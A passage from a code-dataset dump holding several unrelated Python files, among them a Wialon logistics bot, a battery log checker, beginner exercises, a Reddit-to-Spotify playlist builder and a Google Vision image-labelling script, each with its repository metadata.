Проверяем на TypeError\n # Виалон бывает возвращает заявки (orders) в виде списка в списке orders: [[]]\n try:\n t_prev = data['orders'][0]['tm']\n except TypeError:\n element_orders = data['orders'][0]\n data['orders'] = element_orders\n t_prev = data['orders'][0]['tm']\n ml_prev = 0\n vt = (route_id % 86400)\n for _ in data['orders']:\n data_orders = dict()\n number = _['id']\n if type(order_warehouse[number]) is int:\n data_orders = self.orders[0]['orders'][f'{order_warehouse[number]}']\n data_orders['f'] = 0\n elif type(order_warehouse[number]) is dict:\n data_orders = order_warehouse[number]\n # if ((route_id + time.altzone) % 86400) >= _['tm']:\n if ((route_id + 10800) % 86400) >= _['tm']: # вместо 10800 нужно подставить временную зону\n # if (route_id % 86400) >= _['tm']:\n tm = _['tm'] - t_prev\n ml = _['ml'] - ml_prev\n vt = vt + tm\n data_orders['p']['r'] = {\n \"id\": route_id, # id маршрута\n \"i\": i, # порядковый номер (0..)\n \"m\": ml, # пробег с предыдущей точки по плану, м\n \"t\": tm, # время с предыдущей точки по плану, сек\n \"vt\": _['tm'], # время посещения по плану, UNIX_TIME\n \"ndt\": 300 # время, за которое должно прийти уведомление, с\n }\n t_prev = _['tm']\n ml_prev = _['ml']\n else:\n tm = _['tm'] - t_prev\n ml = _['ml'] - ml_prev\n vt = _['tm']\n data_orders['p']['r'] = {\n \"id\": route_id, # id маршрута\n \"i\": i, # порядковый номер (0..)\n \"m\": ml, # пробег с предыдущей точки по плану, м\n \"t\": tm, # время с предыдущей точки по плану, сек\n \"vt\": vt, # время посещения по плану, UNIX_TIME\n \"ndt\": 300 # время, за которое должно прийти уведомление, с\n }\n t_prev = _['tm']\n ml_prev = _['ml']\n data_orders['u'] = keys\n data_orders['rp'] = _['p']\n data_orders['uid'] = 0\n data_orders['id'] = 0\n data_orders['st'] = 0\n data_orders['callMode'] = 'create'\n order_list.append(data_orders)\n i += 1\n except WialonError as e:\n log.info(f'Ошибка: {e.args}')\n\n exp = exp_calc(order_list, \"23:59\")\n params = {\n \"itemId\": self.itemIds,\n \"orders\": order_list,\n \"routeId\": route_id,\n \"exp\": exp,\n \"callMode\": 'create'\n }\n try:\n response = self.wialon_object.call('order_route_update', params)\n except Exception as e:\n log.info(f'Ошибка: {e.args}')\n return response\n\n def update_route(self, order, driver):\n data_orders = dict()\n orders_route = list()\n data = list()\n route_id = int()\n for key, route in self.orders[0]['order_routes'].items():\n if route['st']['u'] == driver and route['st']['s'] == 1:\n orders_route = route['ord']\n route_id = route['uid']\n if len(orders_route) != 0:\n for key, order_ in self.orders[0]['orders'].items():\n if order_['uid'] in orders_route:\n # order['callMode'] = ''\n data.append(order_)\n data.sort(key=lambda dat: dat['p']['r']['vt'])\n order_list = data\n data_len = len(data) - 1\n orders_for_route = []\n warehouses_for_route = []\n if data[data_len]['f'] & 8:\n orders_for_route.append(data[data_len - 1])\n warehouses_for_route.append(data[data_len])\n order_list.pop()\n else:\n orders_for_route.append(data[data_len])\n\n\n __ = order\n time_now = int(time.time())\n\n __['tf'] = time_now - (time_now % 86400) - 10800\n __['tt'] = __['tf'] + 86400\n __['f'] = 0\n __['u'] = str(driver)\n __['callMode'] = 'create'\n orders_for_route.append(__)\n\n\n gis = {\n \"provider\": 1, # 0-нет, 1-gurtam, 2-google\n \"addPoints\": 1, # 0-не возвращать трек, 1-вернуть трек\n \"speed\": 50 # скорость для оптимизации\n }\n params = {\n \"itemId\": self.itemIds,\n \"orders\": orders_for_route,\n \"units\": [driver],\n 
\"warehouses\": warehouses_for_route,\n \"criterions\": {},\n \"priority\": {driver: {0: 0}},\n \"flags\": 131,\n \"gis\": gis\n }\n\n request = self.wialon_object.call('order_optimize', params)\n\n order_warehouse = orders_for_route\n order_warehouse.extend(warehouses_for_route)\n vt = orders_for_route[0]['p']['r']['vt']\n i = orders_for_route[0]['p']['r']['i']\n i += 1\n for keys, data in request.items():\n if keys == 'details':\n pass\n elif keys == 'success':\n pass\n elif keys == 'summary':\n pass\n else:\n # записываем данные о посещении первой точки. Проверяем на TypeError\n # Виалон бывает возвращает заявки (orders) в виде списка в списке orders: [[]]\n try:\n t_prev = data['orders'][0]['tm']\n except TypeError:\n element_orders = data['orders'][0]\n data['orders'] = element_orders\n t_prev = data['orders'][0]['tm']\n\n ml_prev = 0\n data['orders'].pop(0)\n for _ in data['orders']:\n number = _['id']\n tm = _['tm'] - t_prev\n ml = _['ml'] - ml_prev\n vt = vt + tm\n data_orders = dict(order_warehouse[number])\n data_orders['p']['r'] = {\n \"id\": route_id, # id маршрута\n \"i\": i, # порядковый номер (0..)\n \"m\": ml, # пробег с предыдущей точки по плану, м\n \"t\": tm, # время с предыдущей точки по плану, сек\n \"vt\": vt, # время посещения по плану, UNIX_TIME\n \"ndt\": 300 # время, за которое должно прийти уведомление, с\n }\n if vt >= data_orders['tt']:\n data_orders['tt'] = vt + 3600\n t_prev = _['tm']\n ml_prev = _['ml']\n data_orders['u'] = keys\n data_orders['rp'] = _['p']\n\n if data_orders['f'] == 0:\n data_orders['callMode'] = 'create'\n data_orders['uid'] = 0\n data_orders['id'] = 0\n data_orders['st'] = 0\n dp = data_orders['uid']\n\n else:\n data_orders['callMode'] = 'update'\n # data_orders['p']['r']['vt'] -= _['tm']\n '''\n if data_orders['f'] == 264:\n dp2 = list(data_orders['dp'])\n dp2.append(dp)\n data_orders['dp'] = dp2\n '''\n\n # data_orders['itemId'] = orders.itemIds\n order_list.append(data_orders)\n i += 1\n\n exp = exp_calc(order_list, \"23:59\")\n params = {\n \"itemId\": self.itemIds,\n \"orders\": order_list,\n \"routeId\": route_id,\n \"exp\": exp, # здесь указываем, через сколько закрываем маршрут\n \"callMode\": \"update\"\n }\n\n try:\n response = self.wialon_object.call('order_route_update', params)\n data.clear()\n data_orders.clear()\n return response\n except Exception as e:\n tb = sys.exc_info()[2]\n tbinfo = traceback.format_tb(tb)[0]\n log.error(f'Traceback info:\\n{tbinfo}\\n{e.args}')\n log.info(f'Params: {params}')\n data.clear()\n data_orders.clear()\n return e.args\n\n def copy_order(self, id: int, flags: int) -> dict:\n '''\n Функция возвращает копию заявки по id\n :param id: id заявки в Logistics\n :param flags: флаг заявки\n :return: словарь з параметрами заявки\n '''\n data_orders = None\n try:\n data_orders = self.orders_list[id]\n except:\n data_orders = self.warehouse[id]\n finally:\n data_orders['f'] = flags\n time_1 = int(time.time())\n time_1 = time_1 - (time_1 % 86400) - 10800 # вместо 10800 нужно подставить временную зону\n data_orders['tf'] = time_1 + data_orders['tf']\n data_orders['tt'] = time_1 + data_orders['tt']\n return data_orders\n\n def get_driver(self, phone_number: str):\n \"\"\"\n :param phone_number: номер телефона , должен совпасть с номером водителя в Wialon\n :return: если номер телефона совпал возврашаем id назначеного обьекта\n если обьект не назначен возвращаеться 0\n если номер телефона не совпал возвращаем None\n \"\"\"\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"propitemname\",\n 
\"propName\": \"drivers\",\n \"propValueMask\": \"*\",\n \"sortType\": \"drivers\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 256,\n \"from\": 0,\n \"to\": 0\n }\n response = None\n try:\n response = self.wialon_object.call('core_search_items', params)\n except WialonError:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n response = self.wialon_object.call('core_search_items', params)\n finally:\n driver = response['items'][0]['drvrs']\n for _ in driver.values():\n if _['p'][-10:] != '':\n number = _['p'][-10:]\n if number == phone_number[-10:]:\n return _['bu']\n return None\n\n def get_last_navigation(self, driver):\n params = {\n \"id\": driver,\n \"flags\": 1024\n }\n response = None\n try:\n response = self.wialon_object.call('core_search_item', params)\n except WialonError:\n res = self.wialon_object.token_login(token=self.token)\n self.wialon_object.sid = res['eid']\n response = self.wialon_object.call('core_search_item', params)\n finally:\n return response['item']['pos']\n\n def get_resource_for_orders(self):\n '''\n :return: функция возвращает id ресурса, в котором нужно создать заявки\n '''\n spec = {\n \"itemsType\": \"avl_resource\",\n \"propType\": \"property\",\n \"propName\": \"sys_id\",\n \"propValueMask\": '*',\n \"sortType\": \"sys_id\"\n }\n params = {\n \"spec\": spec,\n \"force\": 1,\n \"flags\": 1,\n \"from\": 0,\n \"to\": 0\n }\n data = self.wialon_object.call('core_search_items', params)\n for el in data['items']:\n if el['uacl'] & 0x600000000: # Просмотр заявок и его свойств, создание/редактирование/удаление заявок\n return el['id']\n return None\n\n def import_messages(self, file, unit_id):\n files = {'file': file}\n base_url = 'https://hst-api.wialon.com/wialon/ajax.html?'\n params = {\"itemId\": unit_id}\n\n url = base_url + 'svc=exchange/import_messages¶ms={\"itemId\":%s}&sid=%s'\n r = requests.post(url % (unit_id, self.wialon_object.sid), files=files)\n return r.text\n","repo_name":"AlexandrMilyaev/telegramBotForLogistics","sub_path":"import/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":23029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15385980240","text":"import func\r\n\r\ndef function_1_2(rows_list):\r\n # min_vol_value, max_vol_value, min_vol_index, max_vol_index = [[]]*4\r\n # min_tpr_value, max_tpr_value, min_tpr_index, max_tpr_index = [[]]*4\r\n min_vol_value = []\r\n max_vol_value = []\r\n min_vol_index = []\r\n max_vol_index = []\r\n min_tpr_value = []\r\n max_tpr_value = []\r\n min_tpr_index = []\r\n max_tpr_index = []\r\n\r\n for i in range(0, len(rows_list)):\r\n if 'Invalid' not in rows_list[i]['电池单体电压最低值']:\r\n temp_min_vol_value,temp_max_vol_value,temp_min_vol_index,tem_max_vol_index = function(rows_list,i,'电池单体电压最低值','电池单体电压最高值','最低电压电池单体代号','最高电压电池单体代号','单体电池电压')\r\n temp_min_tpr_value, temp_max_tpr_value, temp_min_tpr_index, temp_max_tpr_index = function(rows_list,i,'最低温度值','最高温度值', '最低温度探针序号','最高温度探针序号','探针温度值')\r\n min_vol_value.append(temp_min_vol_value)\r\n max_vol_value.append(temp_max_vol_value)\r\n min_vol_index.append(temp_min_vol_index)\r\n max_vol_index.append(tem_max_vol_index)\r\n\r\n min_tpr_value.append(temp_min_tpr_value)\r\n max_tpr_value.append(temp_max_tpr_value)\r\n min_tpr_index.append(temp_min_tpr_index)\r\n max_tpr_index.append(temp_max_tpr_index)\r\n resultList = 
[min_vol_value,max_vol_value,min_vol_index,max_vol_index,min_tpr_value,max_tpr_value,min_tpr_index,max_tpr_index]\r\n\r\n for temp in resultList:\r\n temp = func.delNul(temp)\r\n\r\n print('case_1:电池单体电��最低值错误:'+str(min_vol_value))\r\n print(' 电池单体电压最高值错误:' + str(max_vol_value))\r\n print(' 最低电压电池单体代号错误:' + str(min_vol_index))\r\n print(' 最高电压电池单体代号错误:' + str(max_vol_index))\r\n print(' 最低温度值错误:' + str(min_tpr_value))\r\n print(' 最高温度值错误:' + str(max_tpr_value))\r\n print(' 最低温度探针序号错误:' + str(min_tpr_index))\r\n print(' 最高温度探针序号错误:' + str(max_tpr_index))\r\n\r\n return [min_vol_value,max_vol_value,min_vol_index,max_vol_index,min_tpr_value,max_tpr_value,min_tpr_index,max_tpr_index]\r\n\r\ndef function(var_rows_list,index, name_min_value, name_max_value, name_min_index, name_max_index, name_total_value):\r\n\r\n vol_list = var_rows_list[index][name_total_value]\r\n err_min_value = ''\r\n err_max_value = ''\r\n err_min_index = ''\r\n err_max_index = ''\r\n\r\n if vol_list :\r\n vol_list = vol_list[1:-1].split(',')\r\n vol_list = list(map(float, vol_list))\r\n # if 'Invalid' not in rows_list[index][name_min_value] or 'Invalid' not in rows_list[index][name_max_value]:\r\n if float(var_rows_list[index][name_min_value]) != min(vol_list):\r\n err_min_value = var_rows_list[index]['log行号']\r\n if float(var_rows_list[index][name_max_value])!= max(vol_list):\r\n err_max_value = var_rows_list[index]['log行号']\r\n # else:\r\n # print(rows_list[index]['log行号']+'行存在无效值')\r\n\r\n # if 'Invalid' not in rows_list[index][name_min_index] or 'Invalid' not in rows_list[index][name_max_index]:\r\n if int(float(var_rows_list[index][name_min_index])) != vol_list.index(min(vol_list)):\r\n err_min_index = var_rows_list[index]['log行号']\r\n if int(float(var_rows_list[index][name_max_index])) != vol_list.index(max(vol_list)):\r\n err_max_index = var_rows_list[index]['log行号']\r\n # else:\r\n # print(rows_list[index]['log行号'] + '行存在无效值')\r\n\r\n return err_min_value,err_max_value,err_min_index,err_max_index\r\n\r\n\r\n\r\n","repo_name":"hhxxss0722/double","sub_path":"test_log/case_1_2.py","file_name":"case_1_2.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24480902525","text":"# 종합 - 거기까지 그만\n# 입력 : 언제까지 합을 계산할 지, 정수 1개를 입력받음\n# 단, 입력되는 자연수는 100,000,000이하\n# 출력 : 1, 2 ,3 ,4, 5, ... 
순서대로 계속 더해가다가,\n# 그 합이 입력된 정수보다 커지거나 같아지는 경우,\n# 그때까지의 합을 출력\n\nn = int(input())\ns = 0\ni = 0\n\nwhile s < n:\n i += 1\n s = s + i\nprint(s)","repo_name":"Jin-Sol23/CodeUp","sub_path":"86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73545064731","text":"#!/usr/bin/python3\nimport sys\nimport os\nimport subprocess\n\nclass TerminalSetup:\n def __init__(self):\n if not os.getuid() == 0:\n print(\"You must be root!\")\n sys.exit(0)\n self.tgtCount = 0\n self.localCount = 0\n \n def NewTgtTerm(self, terminatorConfig = 'etc/terminator', geometry='1000x400'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'tgt', '--geometry='+geometry, '-T', 'tgt'+str(self.tgtCount)]\n subprocess.run(newTgtCmd, start_new_session=True)\n self.tgtCount += 1\n \n def NewLocalTerm(self, terminatorConfig = 'etc/terminator', geometry='1000x400-50+50'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'local', '--geometry='+geometry]\n print(newTgtCmd)\n subprocess.run(newTgtCmd, start_new_session=True) \n\n def TgtTermExeCmd(self, command, terminatorConfig = 'etc/terminator', geometry='1000x400-0+0'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'tgt', '--geometry='+geometry, '-e', command]\n print(newTgtCmd)\n subprocess.run(newTgtCmd, start_new_session=True)\n \n def LocalTermExeCmd(self, command, terminatorConfig = 'etc/terminator', geometry='1000x400-50+50'):\n newTgtCmd = ['terminator', '-g', terminatorConfig, '-p', 'local', '--geometry='+geometry, '-e', command]\n print(newTgtCmd)\n subprocess.run(newTgtCmd, start_new_session=True)\n\nif __name__ == \"__main__\":\n test = TerminalSetup()\n test.NewTgtTerm()\n #test.NewTgtTerm()\n #test.NewTgtTerm()\n #test.NewLocalTerm()\n #test.LocalTermExeCmd('watch -n1 -d ip -s link show eth0')","repo_name":"Enki--/Ops-Setup","sub_path":"terminals.py","file_name":"terminals.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9922315861","text":"# coding=utf-8\nimport praw\nimport re\nimport spotipy as sp\nimport requests\nimport time\nimport datetime\nimport click\nimport spotipy.util as util\nimport os\n\n# Spotify Creds ###################################################\n# Environment variables should be set for the following:\n# SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET, SPOTIPY_REDIRECT_URI\n###################################################################\n\n# Reddit Creds ####################################################\nREDDIT_CLIENT_ID = os.environ[\"REDDIT_CLIENT_ID\"]\nREDDIT_CLIENT_SECRET = os.environ[\"REDDIT_CLIENT_SECRET\"]\n###################################################################\n\n\nclass SubredditPlaylistBuilder:\n \"\"\"\n Builds a Spotify playlist by scraping a given subreddit for \"artist - track\" pattern in submission titles.\n \"\"\"\n def __init__(self,\n spotify_username,\n subreddit=\"listentothis\"):\n\n self.spotify_username = spotify_username\n self.subreddit = subreddit\n\n # Build client sessions\n self.spotify = self._create_spotify_session()\n\n self.reddit = self._create_reddit_session()\n\n # Scrape tracks\n self.scraped_tracks = self.scrape_subreddit()\n\n # Add tracks\n self.playlist_name = None\n self.playlist_id = None\n self.add_tracks_to_playlist()\n\n def _create_spotify_session(self):\n \"\"\"\n Uses environment vars for Client ID, Secret and 
Redirect URI to create a Spotify\n session.\n\n :return: Instance of Spotify Session.\n \"\"\"\n scope = \"playlist-modify-private\"\n try:\n token = util.prompt_for_user_token(self.spotify_username, scope)\n\n if token:\n print(\"Successfully established Spotify session.\")\n return sp.Spotify(auth=token)\n else:\n raise ValueError(\"No token\")\n except Exception as e:\n raise e\n\n def _create_reddit_session(self):\n \"\"\"\n Uses environment vars for Client ID and Secret to create a Reddit session.\n\n :return: Instance of Reddit Session.\n \"\"\"\n\n try:\n return praw.Reddit(client_id=REDDIT_CLIENT_ID,\n client_secret=REDDIT_CLIENT_SECRET,\n user_agent='Spotty v0.1')\n except requests.HTTPError as e:\n if e.errno in [429, 500, 502, 503, 504]:\n print(\"Reddit is down (error %s), sleeping...\" % e.errno)\n time.sleep(60)\n pass\n else:\n raise e\n except Exception as e:\n print(\"couldn't Reddit: %s\" % str(e))\n\n def scrape_subreddit(self):\n \"\"\"\n Method for scraping all potential tracks from a subreddit. Submission titles\n are validated using an \"artist - title\" regex in track_validator.\n \"\"\"\n tracks = []\n\n def track_validator(submission):\n artist_regex = re.compile('(\\w.+) \\-\\-?')\n title_regex = re.compile('\\w.+ --? (\\w.+) \\[')\n\n try:\n if re.match(artist_regex, submission.title):\n artist = re.match(artist_regex, submission.title).group(1)\n if re.match(title_regex, submission.title):\n title = re.match(title_regex, submission.title).group(1)\n return artist, title\n return False\n except Exception as e:\n print(e)\n return False\n\n for submission in self.reddit.subreddit(self.subreddit).top('week'):\n try:\n tracks.append(track_validator(submission))\n except Exception as e:\n print(e)\n\n return tracks\n\n def add_tracks_to_playlist(self):\n \"\"\"\n Checks scraped tracks from Reddit exist in Spotify, builds a playlist and adds tracks.\n \"\"\"\n\n spotify_tracks = []\n\n try:\n for track in self.scraped_tracks:\n if track:\n searchtrack = self.spotify.search(\n '%s %s' %\n (track[0], track[1]))\n\n if searchtrack[\"tracks\"][\"items\"]:\n search_result_artist = searchtrack[\"tracks\"][\"items\"][0][\"artists\"][0][\"name\"]\n search_result_track = searchtrack[\"tracks\"][\"items\"][0][\"name\"]\n\n print(f\"Reddit : {track[0]} - {track[1]}\")\n print(f\"Spotify : {search_result_artist} - {search_result_track}\")\n print(\"---------------------------------------\")\n spotify_tracks.append(searchtrack[\"tracks\"][\"items\"][0][\"id\"])\n\n if spotify_tracks:\n # Create new playlist with subreddit as title\n user_id = self.spotify.me()[\"id\"]\n self.playlist_name = self.subreddit + \" - \" + str(datetime.date.today())\n self.playlist_id = self.spotify.user_playlist_create(user_id, self.playlist_name, public=False)['id']\n\n self.spotify.user_playlist_add_tracks(self.spotify.me()['id'],\n self.playlist_id,\n spotify_tracks)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n print('''\n\n\n ██████ ██▓███ ▒█████ ▄▄▄█████▓▄▄▄█████▓▓██ ██▓\n ▒██ ▒ ▓██░ ██▒▒██▒ ██▒▓ ██▒ ▓▒▓ ██▒ ▓▒ ▒██ ██▒\n ░ ▓██▄ ▓██░ ██▓▒▒██░ ██▒▒ ▓██░ ▒░▒ ▓██░ ▒░ ▒██ ██░\n ▒ ██▒▒██▄█▓▒ ▒▒██ ██░░ ▓██▓ ░ ░ ▓██▓ ░ ░ ▐██▓░\n ▒██████▒▒▒██▒ ░ ░░ ████▓▒░ ▒██▒ ░ ▒██▒ ░ ░ ██▒▓░\n ▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░░ ▒░▒░▒░ ▒ ░░ ▒ ░░ ██▒▒▒\n ░ ░▒ ░ ░░▒ ░ ░ ▒ ▒░ ░ ░ ▓██ ░▒░\n ░ ░ ░ ░░ ░ ░ ░ ▒ ░ ░ ▒ ▒ ░░\n ░ ░ ░ ░ ░\n ░ ░\n\n\n Welcome to Spotty.\n\n Spotty is a script for scraping subreddits and creating playlists!\n\n You must have a premium Spotify membership to continue.\n\n You will also need 
to grant Spotty access to build your playlist.\n\n Accept in your browser and paste the redirect URL in the terminal. \n\n ''')\n\n\n @click.command()\n @click.argument('username', required=True, nargs=1, type=click.STRING)\n def parse_args(username):\n SubredditPlaylistBuilder(username)\n\n parse_args()\n","repo_name":"benjaminr/spotty","sub_path":"spotty/spotty.py","file_name":"spotty.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30086588047","text":"\"\"\"\r\nWrite a function that returns the number of users in a chatroom based on the\nfollowing rules:\n\n 1. If there is no one, return `\"no one online\"`.\n 2. If there is 1 person, return `\"user1 online\"`.\n 3. If there are 2 people, return `user1 and user2 online\"`.\n 4. If there are `n>2` people, return the first two names and add `\"and n-2 more online\"`.\n\nFor example, if there are 5 users, return:\n\n \"user1, user2 and 3 more online\"\n\n### Examples\n\n chatroom_status([]) ➞ \"no one online\"\n \n chatroom_status([\"paRIE_to\"]) ➞ \"paRIE_to online\"\n \n chatroom_status([\"s234f\", \"mailbox2\"]) ➞ \"s234f and mailbox2 online\"\n \n chatroom_status([\"pap_ier44\", \"townieBOY\", \"panda321\", \"motor_bike5\", \"sandwichmaker833\", \"violinist91\"])\n ➞ \"pap_ier44, townieBOY and 4 more online\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef chatroom_status(users):\n l = len(users)\n if l==0:\n return 'no one online'\n elif l==1:\n return '%s online'%users[0]\n elif l==2:\n return '%s and %s online'%(users[0],users[1])\n else:\n return'%s, %s and %d more online'%(users[0],users[1],len(users)-2)\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"PwGFjiSG3kXzp8rjw_6.py","file_name":"PwGFjiSG3kXzp8rjw_6.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34820033095","text":"#75\ndef qucikSort(num, lo, hi):\n def partition(lo, hi):\n pivot = nums[hi]\n left = lo\n\n for right in range(lo, hi):\n if nums[right] < pivot:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n\n nums[left], nums[hi] = nums[hi], nums[left]\n\n return left\n\n if lo < hi:\n part = partition(lo, hi)\n qucikSort(nums, lo, part - 1)\n qucikSort(nums, part + 1, hi)\n\n\nnums = [2,8,7,1,3,5,6,4]\nqucikSort(nums, 0, len(nums) - 1)\n\nprint(nums)\n\n# 틀렸음","repo_name":"Park-min-hyoung/PAI","sub_path":"정렬/색 정렬.py","file_name":"색 정렬.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37607491800","text":"from itertools import product\n\ndef find_combinations(numbers, answer):\n operators = ['+', '-', '']\n combinations = product(operators, repeat=len(numbers)-1)\n valid = 0\n for c in combinations:\n result = [None] * (2*len(numbers) - 1)\n result[::2], result[1::2] = numbers, c\n if eval(''.join(result)) == answer:\n valid += 1\n return valid\n\ninput = [str(n+1) for n in range(8)] + [str(n) for n in range(7,0,-1)]\nprint(find_combinations(input, 42))","repo_name":"danieman/knowit2018","sub_path":"05/42.py","file_name":"42.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19307903310","text":"import os\nimport sys\n\ntry:\n import xlwt\nexcept ImportError:\n print(\"Installing Data & Time Python Library.\")\n os.system(\"sudo -H pip 
install xlwt\")\n import xlwt\n from xlwt import Workbook\n\ntry:\n import datetime\nexcept ImportError:\n print(\"Installing Data & Time Python Library.\")\n os.system(\"sudo -H pip install datetime\")\n import datetime\n\ntry:\n from google.cloud import vision\nexcept ImportError:\n print(\"Installing Google API Python Library.\")\n os.system(\"sudo -H pip install --ignore-installed --upgrade google-cloud-vision\")\n from google.cloud import vision\n\nimport io\nimport re\nimport unicodedata\nimport urllib2\nimport datetime\n\nfrom zipfile import ZipFile\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\n# Declare a Excel Workbook\nwb = Workbook()\n\n# Add Sheet to Excel WorkBook\nsheet1 = wb.add_sheet('Photo Sheet')\n\nfile_input = \"\"\n\nif len(sys.argv) != 2:\n if len(sys.argv) > 2:\n print(\"Too many Input file passed.\\nUsage: python script.py [filename] OR python script.py \")\n exit(0)\n else:\n csv_input = raw_input(\"No Input File given\\nPlease enter filename:\")\n file_input = csv_input\nelse:\n file_input = sys.argv[1]\n\ncurrentTime = str(datetime.datetime.now())\n\n# name of Excel file\nexcel_output_file = \"RESPONSE_\" + currentTime + \".xls\"\n\ntry:\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"key.json\"\nexcept:\n print(\"Please check if \\\"key.json\\\" file exists.\")\n\n# Instantiates a client\n\ntry:\n client = vision.ImageAnnotatorClient()\nexcept:\n print(\"Can't Instantiate a Google Vision Client.\")\n print(\"Please check your Internet Connection or check if Google API \\\"key.json\\\" is available.\")\n exit(0)\n\n\ndef main():\n cleanup_images_jpg()\n get_info_from_api_flush_to_csv()\n create_zip_folder()\n cleanup_images_jpg()\n\n\n# read all URLs from file\ndef get_info_from_api_flush_to_csv():\n try:\n text_file = open(file_input, 'r')\n file_text = text_file.read()\n except:\n print(\"Bad File. 
Can not Open\")\n exit(0)\n text_file.close()\n\n urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', file_text)\n stop_word = '150x150'\n\n high_resolution_uri_list = []\n\n for uri in urls:\n if stop_word not in uri:\n high_resolution_uri_list.append(uri)\n\n count = 1\n for high_res_uri in high_resolution_uri_list:\n filename = str(count) + '.jpg'\n\n try:\n request = urllib2.Request(high_res_uri)\n img = urllib2.urlopen(request).read()\n with open(filename, 'w') as image:\n image.write(img)\n count = count + 1\n print(\"Downloaded/OK |\" + \" URL \" + high_res_uri)\n except:\n print(\"Not Downloaded/Failed - Image doesn't Exists for the URL - \" + high_res_uri)\n\n print(\"\\nImage Download Complete.\\n\")\n\n photo_cell_row = 0\n\n for i in range(count - 1):\n filename = str(i + 1) + \".jpg\"\n\n photo_name = \"Photo\" + str(i + 1)\n\n print(str(\"200 | OK | \" + filename))\n\n # Get the Full Image Path\n image_name = os.path.join(\n os.path.dirname(__file__), filename)\n\n cell_count = 0\n\n # Loads the image into memory\n with io.open(image_name, 'rb') as image_file:\n content = image_file.read()\n image = types.Image(content=content)\n\n # LABEL_DETECTION\n\n response = client.label_detection(image=image)\n labels = response.label_annotations\n\n # Write Label(s) and Score Attribute into Excel WorkBook\n\n lbl_count = 0\n for label in labels:\n lbl_count = lbl_count + 1\n cell_count = cell_count + 1\n\n sheet1.write(cell_count, photo_cell_row, \"LABEL\" + str(lbl_count))\n sheet1.write(cell_count, photo_cell_row + 1,\n unicodedata.normalize('NFKD', label.description).encode('ascii', 'ignore'))\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"SCORE\" + str(lbl_count))\n sheet1.write(cell_count, photo_cell_row + 1, float(label.score))\n\n # SAFE_SEARCH_DETECTION\n\n response = client.safe_search_detection(image=image)\n safe = response.safe_search_annotation\n\n # Names of likelihood from google.cloud.vision.enums\n likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\n 'LIKELY', 'VERY_LIKELY')\n\n # Write Safe Search Attribute into Excel WorkBook\n\n sheet1.write(cell_count + 1, photo_cell_row, 'ADULT')\n sheet1.write(cell_count + 1, photo_cell_row + 1, likelihood_name[safe.adult])\n\n sheet1.write(cell_count + 2, photo_cell_row, 'MEDICAL')\n sheet1.write(cell_count + 2, photo_cell_row + 1, likelihood_name[safe.medical])\n\n sheet1.write(cell_count + 3, photo_cell_row, 'SPOOFED')\n sheet1.write(cell_count + 3, photo_cell_row + 1, likelihood_name[safe.spoof])\n\n sheet1.write(cell_count + 4, photo_cell_row, 'VIOLENCE')\n sheet1.write(cell_count + 4, photo_cell_row + 1, likelihood_name[safe.violence])\n\n sheet1.write(cell_count + 5, photo_cell_row, 'RACY')\n sheet1.write(cell_count + 5, photo_cell_row + 1, likelihood_name[safe.racy])\n\n cell_count = cell_count + 5\n\n # END\n\n # WEB SEARCH DETECTION\n\n web_detection = client.web_detection(image=image).web_detection\n web_entities = web_detection.web_entities\n\n # Write Image Description and Scores into Excel WorkBook\n web_entities_lbl = 0\n for web_entity in web_entities:\n web_entities_lbl = web_entities_lbl + 1\n cell_count = cell_count + 1\n\n sheet1.write(cell_count, photo_cell_row, \"DESCRIPTION\" + str(web_entities_lbl))\n sheet1.write(cell_count, photo_cell_row + 1,\n unicodedata.normalize('NFKD', web_entity.description).encode('ascii', 'ignore'))\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"SCORE\" 
